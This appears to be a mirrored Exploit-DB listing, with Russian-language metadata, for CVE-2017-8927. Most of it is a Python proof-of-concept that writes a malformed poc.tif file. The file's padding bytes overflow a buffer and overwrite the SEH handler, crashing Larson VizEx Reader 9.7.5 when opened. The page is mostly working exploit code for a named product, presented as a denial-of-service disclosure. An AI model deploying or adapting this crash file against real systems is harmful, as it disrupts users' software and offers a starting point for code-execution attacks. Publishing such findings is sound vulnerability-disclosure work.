- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 42002
- Проверка EDB
-
- Пройдено
- Автор
- MUHANN4D
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2017-8927
- Дата публикации
- 2017-05-14
Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
Код:
#!/usr/bin/python
# Exploit Title : Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)
# Date : 14/05/2017
# Exploit Author : Muhann4d
# CVE : CVE-2017-8927
# Vendor Homepage : http://www.cgmlarson.com/
# Software Link : http://download.freedownloadmanager.org/Windows-PC/Larson-VizEx-Reader/FREE-9.7.5.html
# Affected Versions : 9.7.5
# Category : Denial of Service (DoS) Local
# Tested on OS : Windows 7 Professional SP1 32bit
# Proof of Concept : run the exploit, open the poc.tif file with Larson VizEx Reader 9.7.5
# Vendor has been cantacted but no reply
buf = "\x41" * 800
buff = "\x42" * 4
bufff = "\x43" * 4
buffff = "\x44" * 9999
f = open ("poc.tif", "w")
f.write(buf + buff + bufff + buffff)
f.close()- Источник
- www.exploit-db.com
